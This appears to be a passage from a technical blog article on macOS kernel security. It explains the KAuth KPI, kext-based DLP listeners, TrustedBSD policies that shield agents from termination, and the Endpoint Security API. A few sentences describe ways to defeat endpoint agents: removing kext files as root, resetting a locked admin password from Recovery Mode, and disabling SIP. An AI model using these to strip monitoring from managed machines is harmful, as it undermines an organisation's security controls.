<p>On the other hand, BSD contributes higher-level features, such as the POSIX API, file system management (through APFS), networking, and what will be the main focus of the article, the <a target="_blank" href="https://developer.apple.com/library/archive/technotes/tn2127/_index.html">KAuth KPI</a>. KAuth is the kernel programming interface (KPI) that's responsible for mediating actions that affect the system's security posture, such as file access, network operations, and process management. It operates by registering listeners for various authorization scopes, which then respond to authorization requests by allowing, denying, or deferring decisions based on the policy implemented by the listener.</p>
<p>XNU (Darwin) is a descendant of Rhapsody (OPENSTEP/NeXTSTEP), which was also a heavily customized mix of components such as OSFMK (Mach), 4.4BSD and Yellow Box (which would eventually become Cocoa). The Mach microkernel at the time had better symmetric multiprocessing and memory protection capabilities, and by combining it with FreeBSD (which was derived from the Unix codebase) XNU could maintain compatibility with existing Unix programs and APIs used in many academic and professional settings at the time.</p>
<p>BSD and Mach are built upon different conceptual frameworks, which leads to some funny interactions between the two, such as:</p>
<ul>
<li><p>In BSD, signals are delivered to processes. Mach has no notion of signals at all; faults are reported as exception messages sent to ports, and execution is tracked per thread. XNU bridges this gap by translating Mach exceptions into BSD signals and delivering each signal to a Mach thread that belongs to the BSD process intended to receive it.</p>
</li>
<li><p>When a new process is created via <code>fork()</code> in BSD, the child process inherits a copy of the parent's file descriptors. In Mach, tasks do not have a notion of file descriptors. XNU handles this by creating a new task for the child process and sharing the parent's file descriptor rights with the child task.</p>
</li>
<li><p>BSD manages memory at the process level, while Mach manages memory at the task level. XNU maps the BSD process memory model to Mach's task-based memory management by creating a Mach virtual memory object for each BSD process.</p>
</li>
<li><p>BSD schedules processes, while Mach schedules threads. XNU's scheduler is primarily based on Mach's thread scheduling mechanisms, but it also takes BSD's process priorities into account when determining which threads to schedule.</p>
</li>
<li><p>Mach's security model is based on port rights, whereas BSD's security model operates based on process ownership. Disparities between these two models have occasionally resulted in <a target="_blank" href="https://www.offsec.com/offsec/macos-preferences-priv-escalation/">local privilege-escalation</a> vulnerabilities.</p>
</li>
<li><p>Neither Mach nor BSD on its own defines how third-party code gets loaded into the kernel. XNU adds kernel extensions for this: a kext is loaded into kernel space and links against the Mach, BSD, libkern and I/O Kit KPIs that the kernel exports.</p>
</li>
</ul>
<p>The last part is what we are interested in. Kernel Extensions (kexts) on macOS are akin to drivers in Windows, extending the functionality of the macOS kernel. This is what endpoint security vendors usually rely on to hook the kernel for security events; specifically, they use the Kernel Authorization KPI (KAuth KPI). The KAuth KPI provides a mechanism for kernel extensions to perform authorization checks and enforce security policies for various kernel operations. It allows kernel extensions to register callbacks for specific scopes and actions, and intervene in the authorization process.</p>
<h3 id="heading-kernel-extensions-and-kauth-kpi">Kernel Extensions and KAuth KPI</h3>
<p>The KAuth KPI organizes operations into different scopes, each representing an area of interest for authorization. Some common scopes include:</p>
<ul>
<li><p><code>KAUTH_SCOPE_VNODE</code>: Covers operations on file-like objects (vnodes) such as executing, reading, writing, or deleting files.</p>
</li>
<li><p><code>KAUTH_SCOPE_FILEOP</code>: Provides advisory notifications for file system operations, useful for logging or cache invalidation.</p>
</li>
<li><p><code>KAUTH_SCOPE_PROCESS</code>: Relates to process management operations like forking, executing, or tracing processes.</p>
</li>
</ul>
<p>Within each scope, there are specific actions that your kernel extension can monitor and authorize. For example, within the <code>KAUTH_SCOPE_VNODE</code> scope, the <code>KAUTH_VNODE_EXECUTE</code> action represents the execution of a file.</p>
<p>To use the KAuth KPI, your kernel extension needs to register a listener callback for the desired scope and action.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">kern_return_t</span> <span class="hljs-title">RegisterListener</span><span class="hljs-params">()</span> </span>{
    vnode_listener_ = kauth_listen_scope(
        KAUTH_SCOPE_VNODE, vnode_scope_callback, <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">void</span> *&gt;(<span class="hljs-keyword">this</span>));
    <span class="hljs-keyword">if</span> (!vnode_listener_) <span class="hljs-keyword">return</span> kIOReturnInternalError;
    <span class="hljs-keyword">return</span> kIOReturnSuccess;
}
</code></pre>
<p>The <code>kauth_listen_scope</code> function registers a callback function (<code>vnode_scope_callback</code> in this example) for the specified scope (<code>KAUTH_SCOPE_VNODE</code>). The third argument is a cookie that will be passed to the callback function, allowing you to associate it with your kernel extension's context.</p>
<p>The listener callback function is where you can inspect the operation being performed and make an authorization decision.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">extern</span> <span class="hljs-string">"C"</span> <span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">vnode_scope_callback</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span> credential, <span class="hljs-keyword">void</span> *cookie, <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span> arg0, <span class="hljs-keyword">uintptr_t</span> arg1, <span class="hljs-keyword">uintptr_t</span> arg2, <span class="hljs-keyword">uintptr_t</span> arg3)</span> </span>{

    <span class="hljs-comment">// check if the action is KAUTH_VNODE_EXECUTE</span>
    <span class="hljs-keyword">if</span> ((action &amp; KAUTH_VNODE_EXECUTE) &amp;&amp; !(action &amp; KAUTH_VNODE_ACCESS)) {
        <span class="hljs-comment">// retrieve the vnode and VFS context from the arguments</span>
        <span class="hljs-keyword">vnode_t</span> vp = <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">vnode_t</span>&gt;(arg1);
        <span class="hljs-keyword">vfs_context_t</span> context = <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">vfs_context_t</span>&gt;(arg0);

        <span class="hljs-comment">// perform authorization check</span>
        <span class="hljs-keyword">int</span> result = AuthorizeFileExecution(credential, context, vp);

        <span class="hljs-keyword">return</span> result;
    }

    <span class="hljs-comment">// defer to other listeners for actions we don't handle</span>
    <span class="hljs-keyword">return</span> KAUTH_RESULT_DEFER;
}
</code></pre>
<p>In this example, the callback function checks whether the action includes <code>KAUTH_VNODE_EXECUTE</code> and does not have the <code>KAUTH_VNODE_ACCESS</code> bit set, which marks a request as an advisory check rather than a real operation. If so, it retrieves the vnode and VFS context from the arguments (<code>arg1</code> and <code>arg0</code>, respectively). It then calls an <code>AuthorizeFileExecution</code> function to perform the authorization check based on the provided credentials, context, and vnode. The result of this authorization check is returned to the KAuth KPI.</p>
<p>If the action is not <code>KAUTH_VNODE_EXECUTE</code>, the callback function returns <code>KAUTH_RESULT_DEFER</code>, deferring the authorization decision to other registered listeners or the default BSD permission model. The listener callback function needs to return one of the following values to the KAuth KPI, indicating the authorization decision:</p>
<ul>
<li><p><code>KAUTH_RESULT_ALLOW</code>: Allow the operation to proceed.</p>
</li>
<li><p><code>KAUTH_RESULT_DENY</code>: Deny the operation and prevent it from happening.</p>
</li>
<li><p><code>KAUTH_RESULT_DEFER</code>: Defer the decision to other registered listeners or the default BSD permission model.</p>
</li>
</ul>
<p>The decision-making logic for authorizing an operation can be as simple or complex as needed, depending on your security requirements. It could involve checking file signatures, consulting a whitelist or blacklist, or performing more advanced policy evaluations.</p>
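<p>To make the three return values a bit more concrete, here is a minimal user-space sketch (plain C++, no kernel headers) of how I understand the answers of several listeners get combined: a deny from any listener wins, and the operation only goes ahead on an explicit allow. The <code>Result</code> enum and the <code>combine</code> and <code>operationAllowed</code> helpers are hypothetical names for illustration, not part of the KAuth KPI.</p>

```cpp
#include <cassert>
#include <vector>

// Hypothetical stand-ins for the kernel's KAUTH_RESULT_* constants.
enum class Result { Allow, Deny, Defer };

// Simplified model (an assumption, not the kernel source):
// a deny from any listener wins; otherwise the first non-defer answer stands.
inline Result combine(const std::vector<Result>& results) {
    Result decision = Result::Defer;
    for (Result r : results) {
        if (r == Result::Deny || decision == Result::Defer) {
            decision = r;
        }
    }
    return decision;
}

// The operation only proceeds on an explicit allow.
inline bool operationAllowed(const std::vector<Result>& results) {
    return combine(results) == Result::Allow;
}
```

<p>In this model, a defer followed by an allow lets the operation through, while an allow followed by a deny blocks it. When every third-party listener defers, the answer has to come from somewhere else, which is where the default BSD permission model comes in.</p>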
<p>We can pretty quickly gather what a kext is doing by inspecting its property list (plist) file.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// info.plist for one kext of a market-leading DLP provider</span>
<span class="hljs-comment">// some lines are edited for clarity</span>
    &lt;key&gt;OSBundleLibraries&lt;/key&gt;
    &lt;dict&gt;
        &lt;key&gt;com.apple.kpi.bsd&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.iokit&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.libkern&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.mach&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.product.endpoint.process&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">1.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
    &lt;/dict&gt;
</code></pre>
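<p>At a high level, the main DLP component launches and connects to its kernel extension. The kernel extension then declares a number of dependencies under <code>OSBundleLibraries</code>, namely Apple's kernel programming interfaces (KPIs) and one of the vendor's other kexts (<code>com.product.endpoint.process</code>), to perform certain operations:</p>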
<ul>
<li><p><code>com.apple.kpi.libkern</code> is the foundational kernel library that kexts link against; it provides the base runtime (for example the C++ object classes) that the rest of a kext builds on.</p>
</li>
<li><p><code>com.apple.kpi.bsd</code> is used to access the BSD subsystem inside XNU to monitor and intercept file operations, network communications, or process activities to prevent unauthorized data exfiltration.</p>
</li>
<li><p><code>com.apple.kpi.mach</code> is used to access the Mach subsystem inside XNU to monitor for in-memory execution and unauthorized threads.</p>
</li>
<li><p><code>com.apple.kpi.iokit</code> is used to monitor external device connections (e.g., USB drives) or network interfaces, enabling the extension to block or audit data transfers that could lead to data loss.</p>
</li>
</ul>
<p>Let's say a user invokes a command to copy a file, such as <code>cp</code> in zsh. The command triggers file-system operations that are handled by the Virtual File System (VFS). KAuth listeners that are registered for file operations (VNODE scope) will receive notifications of the read and write requests. The <code>kauth_action_t</code> will correspond to the file operations, such as <code>KAUTH_VNODE_READ_DATA</code> for reading from the source file and <code>KAUTH_VNODE_WRITE_DATA</code> for writing to the destination.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// NOTE : This code is heavily edited for readability</span>
<span class="hljs-comment">// the callback function for vnode scope events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">Listener</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span>   credential,
    <span class="hljs-keyword">void</span> *         idata,
    <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span>      arg0,
    <span class="hljs-keyword">uintptr_t</span>      arg1,
    <span class="hljs-keyword">uintptr_t</span>      arg2,
    <span class="hljs-keyword">uintptr_t</span>      arg3)</span> </span>{

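    <span class="hljs-comment">// vnode scope arguments: arg1 is the target vnode, arg2 its parent directory</span>
    <span class="hljs-comment">// (declarations of the path and string buffers are omitted for brevity)</span>
    <span class="hljs-keyword">vnode_t</span> vp = (<span class="hljs-keyword">vnode_t</span>)arg1;
    <span class="hljs-keyword">vnode_t</span> dvp = (<span class="hljs-keyword">vnode_t</span>)arg2;
    <span class="hljs-keyword">int</span> result = KAUTH_RESULT_DEFER;

    <span class="hljs-comment">// create human-readable paths and actions</span>
    err = CreateVnodePath(vp, &amp;vpPath);
    err = CreateVnodePath(dvp, &amp;dvpPath);
    err = CreateVnodeActionString(action, vnode_isdir(vp), &amp;actionStr, &amp;actionStrBufSize);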

    <span class="hljs-comment">// refer to DLP Policy</span>
    <span class="hljs-keyword">char</span> *dlpPolicy = <span class="hljs-literal">NULL</span>;
    <span class="hljs-keyword">if</span> (getPolicy(&amp;dlpPolicy) == <span class="hljs-number">0</span> &amp;&amp; dlpPolicy != <span class="hljs-literal">NULL</span>) {
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(vpPath, dlpPolicy) == <span class="hljs-number">0</span> &amp;&amp; (action &amp; KAUTH_VNODE_WRITE_DATA)) {
            <span class="hljs-comment">// deny operation</span>
            result = KAUTH_RESULT_DENY;
        }
    }

    <span class="hljs-keyword">if</span> (vnode_isdir(vp) &amp;&amp; (action &amp; KAUTH_VNODE_ADD_FILE)) {
        <span class="hljs-comment">// allow operation</span>
        result = KAUTH_RESULT_ALLOW;
    }

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
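<p>The <code>action</code> bitmask in the listener above is easier to reason about once it is decoded into names, which is roughly what a helper like <code>CreateVnodeActionString</code> does. Below is a minimal user-space sketch of that idea. The bit values are what I recall from <code>sys/kauth.h</code> and should be treated as assumptions, and <code>describeAction</code> is a hypothetical helper, not the vendor's code. It also shows why the listener needs <code>vnode_isdir</code>: the same bit means something different for files and directories.</p>

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Assumed bit values, mirroring sys/kauth.h as I recall it.
constexpr std::uint32_t kReadData  = 1u << 1;  // READ_DATA on files, LIST_DIRECTORY on dirs
constexpr std::uint32_t kWriteData = 1u << 2;  // WRITE_DATA on files, ADD_FILE on dirs
constexpr std::uint32_t kExecute   = 1u << 3;  // EXECUTE on files, SEARCH on dirs

// Hypothetical helper: turn an action bitmask into a readable string.
std::string describeAction(std::uint32_t action, bool isDir) {
    std::string out;
    auto append = [&out](const char* name) {
        if (!out.empty()) out += "|";
        out += name;
    };
    if (action & kReadData)  append(isDir ? "LIST_DIRECTORY" : "READ_DATA");
    if (action & kWriteData) append(isDir ? "ADD_FILE" : "WRITE_DATA");
    if (action & kExecute)   append(isDir ? "SEARCH" : "EXECUTE");
    return out.empty() ? "NONE" : out;
}
```

<p>For the <code>cp</code> case, the source file would decode to <code>READ_DATA</code> and the destination to <code>WRITE_DATA</code>, while the same write bit on the destination directory decodes to <code>ADD_FILE</code>.</p>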
<p>The security product receives these events and forwards them to the agent policy holder, which finally decides whether to allow (<code>KAUTH_RESULT_ALLOW</code>), deny (<code>KAUTH_RESULT_DENY</code>), or defer to another listener (<code>KAUTH_RESULT_DEFER</code>) for a decision. Deferring is used when there is another product tacked onto the DLP that has policies in addition to the main DLP agent policy.</p>
<p>This is common as many endpoint security products bundle <a target="_blank" href="https://help.forcepoint.com/fpone/deploy/rhtml/fd6c40aa-2587-4950-b33a-ecd3e47d93e1.html">additional features</a> or <a target="_blank" href="https://www.dtexsystems.com/intercept-platform/dtex-intercept-for-crowdstrike-falcon/">alternative products</a> under one agent, which usually boil down to additional rulesets. For example, an additional check might be done by calling an alternative <code>kext</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">Listener</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span>   credential,
    <span class="hljs-keyword">void</span> *         idata,
    <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span>      arg0,
    <span class="hljs-keyword">uintptr_t</span>      arg1,
    <span class="hljs-keyword">uintptr_t</span>      arg2,
    <span class="hljs-keyword">uintptr_t</span>      arg3)</span> </span>{

    <span class="hljs-comment">// ... (previous code) ...</span>

    <span class="hljs-keyword">if</span> (result == KAUTH_RESULT_DEFER) {
        <span class="hljs-comment">// call alternative kext to handle additional policy checks</span>
        result = CheckPolicy(credential, idata, action, arg0, arg1, arg2, arg3);
    }

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<h3 id="heading-process-protections-through-trustedbsd">Process Protections Through TrustedBSD</h3>
<p>While uninstalling endpoint security agents like DLPs and EDRs usually requires a key generated from the master console, a user with root access to the system can simply remove the kext files and completely uninstall the agent. Removing admin access from the device helps, but users can still reset the password for a locked admin account by booting into Recovery Mode and running the <code>resetpassword</code> utility in the provided terminal.</p>
<p>This is where process protection kexts enter the picture. They start with the <a target="_blank" href="https://web.archive.org/web/20190616195406/https://developer.apple.com/documentation/kernel/mac_policy_h"><code>mac_policy_register</code></a> function, which is part of the TrustedBSD Mandatory Access Control (MAC) framework. This works similarly to how <a target="_blank" href="https://www.redhat.com/en/topics/linux/what-is-selinux">SELinux</a> locks down certain Linux processes and files from tampering.</p>
<p>TrustedBSD itself was introduced in Mac OS X 10.5 and is used by Apple to isolate applications from interacting with user-controlled objects. While the sandbox implementation isn't designed to protect an application from user tampering, many security vendors use it to do just that.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// callback function to handle process signal events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">mpo_proc_check_signal_callback</span><span class="hljs-params">(<span class="hljs-keyword">kauth_cred_t</span> cred, struct proc *p, <span class="hljs-keyword">int</span> signum)</span> </span>{
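    <span class="hljs-keyword">char</span> procName[MAXCOMLEN + <span class="hljs-number">1</span>];
    <span class="hljs-comment">// look up the name of the target process (p), not the calling process</span>
    proc_name(proc_pid(p), procName, <span class="hljs-keyword">sizeof</span>(procName));

    <span class="hljs-comment">// check if the process being signaled is your DLP application</span>
    <span class="hljs-comment">// (procName holds at most MAXCOMLEN characters, so compare only that prefix)</span>
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(procName, <span class="hljs-string">"com.company.endpoint.dlp"</span>, MAXCOMLEN) == <span class="hljs-number">0</span>) {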
        <span class="hljs-comment">// block the signal if it's a termination signal (e.g., SIGTERM, SIGKILL)</span>
        <span class="hljs-keyword">if</span> (signum == SIGTERM || signum == SIGKILL) {
            <span class="hljs-keyword">return</span> EPERM; <span class="hljs-comment">// deny the signal</span>
        }
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; <span class="hljs-comment">// allow the signal</span>
}

<span class="hljs-comment">// struct to hold the callback function pointers</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_ops</span> <span class="hljs-title">mac_ops</span> = {</span>
    .mpo_proc_check_signal = mpo_proc_check_signal_callback,
    <span class="hljs-comment">// add other callback functions as needed</span>
};

<span class="hljs-comment">// struct to configure the policy</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_conf</span> <span class="hljs-title">mac_policy_conf</span> = {</span>
    .mpc_name = <span class="hljs-string">"com.company.endpoint.dlp"</span>,
    .mpc_labelname_count = <span class="hljs-number">0</span>,
    .mpc_ops = &amp;mac_ops,
    .mpc_loadtime_flags = <span class="hljs-number">0</span>, <span class="hljs-comment">// make the policy non-unloadable</span>
    .mpc_field_off = <span class="hljs-literal">NULL</span>,
    .mpc_runtime_flags = <span class="hljs-number">0</span>
};

<span class="hljs-comment">// register the policy during kext initialization</span>
<span class="hljs-function"><span class="hljs-keyword">kern_return_t</span> <span class="hljs-title">DLPProtectKext_start</span><span class="hljs-params">(<span class="hljs-keyword">kmod_info_t</span> *ki, <span class="hljs-keyword">void</span> *d)</span> </span>{
    <span class="hljs-keyword">mac_policy_handle_t</span> handle;
    <span class="hljs-keyword">int</span> error = mac_policy_register(&amp;mac_policy_conf, &amp;handle, d);
    <span class="hljs-keyword">if</span> (error != <span class="hljs-number">0</span>) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to register DLP protection policy\n"</span>);
        <span class="hljs-keyword">return</span> KERN_FAILURE;
    }

    <span class="hljs-keyword">return</span> KERN_SUCCESS;
}
</code></pre>
<p>In this example, the <code>mpo_proc_check_signal_callback</code> function checks if the process being signaled is your DLP application (<code>com.company.endpoint.dlp</code>). If it is, and the signal is a termination signal (<code>SIGTERM</code> or <code>SIGKILL</code>), the function returns <code>EPERM</code> to deny the signal. Otherwise, it allows the signal by returning <code>0</code>.</p>
<p>The <code>mac_ops</code> struct holds the callback function pointer, and the <code>mac_policy_conf</code> struct configures the policy with a name and the <code>mac_ops</code> struct (a human-readable description would go in <code>mpc_fullname</code>, which is omitted here).</p>
<p>During the kernel extension's initialization (<code>DLPProtectKext_start</code>), the policy is registered with the TrustedBSD framework using <code>mac_policy_register</code>. The <code>mpc_loadtime_flags</code> field is set to <code>0</code> to make the policy non-unloadable.</p>
<p>Kexts can also track the protected PIDs dynamically. One variant performs a bitwise operation on the signal number (<code>SIGTERM</code>/<code>SIGKILL</code>) and checks the result against a mask; the example below compares the signal number directly. The callback then checks whether the calling process or the target process is a PID belonging to the protected process.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// callback function to handle process signal events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">mpo_proc_check_signal_callback</span><span class="hljs-params">(<span class="hljs-keyword">kauth_cred_t</span> cred, struct proc *p, <span class="hljs-keyword">int</span> signum)</span> </span>{
    <span class="hljs-keyword">pid_t</span> calling_pid = proc_selfpid();
    <span class="hljs-keyword">pid_t</span> target_pid = proc_pid(p);

    <span class="hljs-comment">// check if the calling process or the target process is a trusted PID</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_trusted_pids; i++) {
        <span class="hljs-keyword">if</span> (calling_pid == trusted_pids[i] || target_pid == trusted_pids[i]) {
            <span class="hljs-comment">// block the signal if it's a termination signal (e.g., SIGTERM, SIGKILL)</span>
            <span class="hljs-keyword">if</span> (signum == SIGTERM || signum == SIGKILL) {
                <span class="hljs-keyword">return</span> EPERM; <span class="hljs-comment">// deny the signal</span>
            }
        }
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; <span class="hljs-comment">// allow the signal</span>
}

<span class="hljs-comment">// struct to hold the callback function pointers</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_ops</span> <span class="hljs-title">mac_ops</span> = {</span>
    .mpo_proc_check_signal = mpo_proc_check_signal_callback,
    <span class="hljs-comment">// add other callback functions as needed</span>
};

<span class="hljs-comment">// struct to configure the policy</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_conf</span> <span class="hljs-title">mac_policy_conf</span> = {</span>
    .mpc_name = <span class="hljs-string">"com.company.endpoint.dlp"</span>,
    .mpc_labelname_count = <span class="hljs-number">0</span>,
    .mpc_ops = &amp;mac_ops,
    .mpc_loadtime_flags = <span class="hljs-number">0</span>, <span class="hljs-comment">// make the policy non-unloadable</span>
    .mpc_field_off = <span class="hljs-literal">NULL</span>,
    .mpc_runtime_flags = <span class="hljs-number">0</span>
};
</code></pre>
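<p>The mask-based variant of the signal check can be sketched in a few lines of plain C++. This is a user-space illustration under my own assumptions: <code>signalBit</code>, <code>kTerminationMask</code>, and <code>isTerminationSignal</code> are hypothetical names, and the "signal N maps to bit N-1" layout follows the classic BSD <code>sigmask</code> convention rather than any particular vendor's kext.</p>

```cpp
#include <cassert>
#include <csignal>
#include <cstdint>

// One bit per signal number: signal N maps to bit N-1.
// Out-of-range signal numbers map to no bit at all.
constexpr std::uint32_t signalBit(int signum) {
    return (signum >= 1 && signum <= 32) ? (1u << (signum - 1)) : 0u;
}

// Hypothetical mask of the signals a protection policy wants to block.
const std::uint32_t kTerminationMask = signalBit(SIGTERM) | signalBit(SIGKILL);

// True when the signal number falls inside the blocked mask.
inline bool isTerminationSignal(int signum) {
    return (signalBit(signum) & kTerminationMask) != 0;
}
```

<p>The upside of a mask over a chain of comparisons is that adding another signal to the blocked set is a one-bit change instead of another branch in the callback.</p>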
<p>To block the SIGTERM or SIGKILL signal from being delivered to your trusted process, you can modify the <code>mpo_proc_check_signal_callback</code> function to return <a target="_blank" href="https://docs.freebsd.org/en/books/arch-handbook/mac/#mac-access-control-checks"><code>EPERM</code></a> when the signal is detected as a termination signal, and the target process is a trusted PID.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1710769794795/33c996d9-fe98-4c99-ba5a-77e6cac8af4b.png" alt class="image--center mx-auto" /></p>
<p>This is why, if you try to terminate the process of a kext-based security product or copy its configuration files in the Library folder, you'll sometimes receive an error message despite having root-level privileges. This is probably because there is a secondary agent that monitors and protects the integrity of the process and the binaries related to it, and answers with <code>EPERM</code> for the signal or <code>KAUTH_RESULT_DENY</code> for the file operation.</p>
<h3 id="heading-limitations-of-kext-based-security-products">Limitations of Kext-based Security Products</h3>
<p>One of the key issues with kernel extensions is their ability to introduce stability and security problems. Since kexts operate within the kernel, they bypass the usual macOS security mechanisms such as Gatekeeper and System Integrity Protection (SIP). There have also been a lot of documented cases of third-party kernel extensions being broken <a target="_blank" href="https://whitehatmac.com/macos-bugs-are-causing-kext-failures/">because of a system update</a> or <a target="_blank" href="https://github.com/intel/haxm/issues/93">causing system instability</a>. This is due to Apple making constant revisions to kernel interfaces that third-party devs may not have clear insight into. The <a target="_blank" href="https://blog.maikxchd.com/analyzing-genshin-impacts-anticheat-module">security risk posed</a> by having usermode agents interact with kernel components has also been documented on Windows.</p>
<p>This is where the previously mentioned Endpoint Security API takes the torch.</p>
<h3 id="heading-implementation-using-endpoint-security-api">Implementation using Endpoint Security API</h3>
<p>The new Apple Endpoint Security (ES) API has largely replaced the KAuth KPI, which now generates a compile-time warning with the message <code>__kpi_deprecated("Use EndpointSecurity instead")</code> to warn developers of the impending transition. Some security vendors for macOS have either <a target="_blank" href="https://www.sentinelone.com/blog/going-kextless-why-we-all-need-to-transition-away-from-kernel-extensions/">already transitioned</a> to the ES API, have <a target="_blank" href="https://www.cyberhaven.com/blog/the-only-day-zero-dlp-solution-available-for-macos-big-sur">built their products</a> around usermode-based security protections since the beginning, or <a target="_blank" href="https://www.forcepoint.com/blog/insights/big-sur-macos-11-update">are still planning</a> to move their legacy kext-based implementations to system extensions.</p>
<p>As we saw in the previous article, the ES API gives security products a rich event stream to capture, log, and prevent certain operations through an Apple-built kernel extension. But there are also other benefits to being an ES application:</p>
<ul>
<li><p>The process becomes protected by System Integrity Protection (SIP), which prevents tampering with the extension and related processes by the user or external threat actors, so third-party security products enjoy the same level of protection as SIP-protected Apple binaries</p>
</li>
<li><p>There is also a greater level of protection for the daemon, similar to the protection given to Apple-made system daemons, which means even root users cannot unload your <code>launchd</code> job (similar to Protected Process Light (PPL) processes in Windows)</p>
</li>
<li><p>Your system extension can also launch and set up an event stream before other applications are able to execute (similar to Early Launch Anti-Malware (ELAM) drivers in Windows)</p>
</li>
</ul>
<p>Like the KAuth KPI, the Endpoint Security API allows system extensions to subscribe to specific event types and receive notifications or authorization requests for those events. The system extension can then make decisions to allow or deny the requested operations based on its security policies. Both APIs also provide a callback mechanism for system extensions to receive event notifications and make authorization decisions, but the Endpoint Security API uses a more streamlined callback approach, as we'll see shortly.</p>
<p>One of the main differences between the Endpoint Security API and KAuth KPI is the execution environment. While KAuth listeners run inside the kernel, Endpoint Security clients run entirely in user space (the kernel side is handled by Apple's own <code>EndpointSecurity.kext</code>), making the API more suitable for modern system extensions that are moving away from the kernel.</p>
<p>Another key difference is the event granularity. The Endpoint Security API provides a more fine-grained set of event types compared to the broad scopes offered by KAuth. This allows for better control over what events a system extension can monitor and authorize.</p>
<p>There are two ways to connect to the ES API. The first is a launch daemon that acts as a regular system-scope daemon, which requires the process to be <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_new_client_result_t/es_new_client_result_err_not_privileged">running as root</a>. The second is a system extension, which acts as the user-space receiver for events coming from Apple's kernel extension (<code>EndpointSecurity.kext</code>).</p>
<p>Building your product as a system-scope daemon is ideal for analysis and research tools (similar to Sysmon on Windows), as users don't need to deal with the system extension installation process and can connect immediately to the event stream. Building your product as a system extension is ideal for endpoint security products, which benefit from the protections given by SIP against potential tampering and can set up an event stream before other applications are active.</p>
<p>While subscribing to ES events is not difficult programmatically, ES is considered a <a target="_blank" href="https://developer.apple.com/help/account/reference/provisioning-with-managed-capabilities/">managed capability</a> in macOS. This means that to start building an ES application, you need the <code>com.apple.developer.endpoint-security.client</code> entitlement, which has to be granted by <a target="_blank" href="https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_developer_endpoint-security_client"><strong>Apple</strong></a> via the <a target="_blank" href="https://developer.apple.com/contact/request/system-extension/"><strong>Apple Developer System Extensions Request Form</strong></a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1710602941917/1ceeffff-b235-4149-b818-883a2ba60155.png" alt class="image--center mx-auto" /></p>
<p>Once you get the approval for the entitlement, you or your organization can create system extensions and ES-enabled userspace apps freely. However, if you would rather skip this long and expensive process, you can also subscribe and run non-entitled ES API applications by <a target="_blank" href="https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection">disabling SIP</a>.</p>
<p>In creating ES apps, it's good that <code>EndpointSecurity</code> is offered as a C API, so it can be used from a lot of languages: C/C++ and Objective-C, but also memory-safe ones such as Swift and Rust. To me, the code below is so straightforward and readable compared to the hieroglyphic-like KPI code from above that it's ridiculous. Moving this logic out of the kernel also reduces the possibilities for a memory corruption exploit, which is a top source of exploits in KPI implementations.</p>
<p>To use the Endpoint Security API, a system extension must create an Endpoint Security client and register a callback function.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">es_client_t</span> *client = <span class="hljs-literal">NULL</span>;
